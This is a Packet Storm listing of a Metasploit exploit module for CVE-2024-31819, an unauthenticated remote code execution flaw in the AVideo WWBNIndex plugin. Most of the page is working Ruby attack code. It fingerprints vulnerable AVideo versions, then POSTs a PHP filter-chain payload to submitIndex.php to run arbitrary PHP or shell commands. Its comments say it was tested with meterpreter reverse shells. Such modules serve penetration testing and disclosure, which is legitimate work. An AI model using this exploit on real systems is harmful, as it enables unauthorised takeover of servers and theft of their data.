exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AVideo WWBNIndex Plugin Unauthenticated Remote Code Execution

AVideo WWBNIndex Plugin Unauthenticated Remote Code Execution
Posted May 22, 2024
Authored by Valentin Lobstein | Site metasploit.com

This Metasploit module exploits an unauthenticated remote code execution vulnerability in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the submitIndex.php file, where user-supplied input is passed directly to the require() function without proper sanitization. By exploiting this, an attacker can leverage the PHP filter chaining technique to execute arbitrary PHP code on the server. This allows for the execution of commands and control over the affected system. The exploit is particularly dangerous because it does not require authentication, making it possible for any remote attacker to exploit this vulnerability.

tags | exploit, remote, arbitrary, php, code execution
advisories | CVE-2024-31819
SHA-256 | 7df90df7e75927e09777170cc36a4823a5062bc6e077056564aea5f7a6ba8b7f

AVideo WWBNIndex Plugin Unauthenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::PhpFilterChain
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',
'Description' => %q{
This module exploits an unauthenticated remote code execution (RCE) vulnerability
in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the
`submitIndex.php` file, where user-supplied input is passed directly to the `require()`
function without proper sanitization. By exploiting this, an attacker can leverage the
PHP filter chaining technique to execute arbitrary PHP code on the server. This allows
for the execution of commands and control over the affected system. The exploit is
particularly dangerous because it does not require authentication, making it possible
for any remote attacker to exploit this vulnerability.
},
'Author' => [
'Valentin Lobstein'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-31819'],
['URL', 'https://github.com/WWBN/AVideo'],
['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']
],
'Platform' => ['php', 'unix', 'linux', 'win'],
'Arch' => [ARCH_PHP, ARCH_CMD],
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix In-Memory',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows In-Memory',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
],
],
'Privileged' => false,
'DisclosureDate' => '2024-04-09',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
},
'DefaultOptions' => {
'SSL' => true,
'RPORT' => 443,
'FETCH_WRITABLE_DIR' => '/tmp'
}
)
)
end

def exploit
php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
filter_payload = generate_php_filter_payload(php_code)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
'ctype' => 'application/x-www-form-urlencoded',
'data' => "systemRootPath=#{filter_payload}"
)
print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code
end

def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'follow_redirect' => true
})
return CheckCode::Unknown('Failed to connect to the target.') unless res
return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)
return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]

version = Rex::Version.new(version_match[1])
plugin_check = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
'method' => 'GET'
})
unless plugin_check&.code == 200
CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')
end

if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")
end

CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close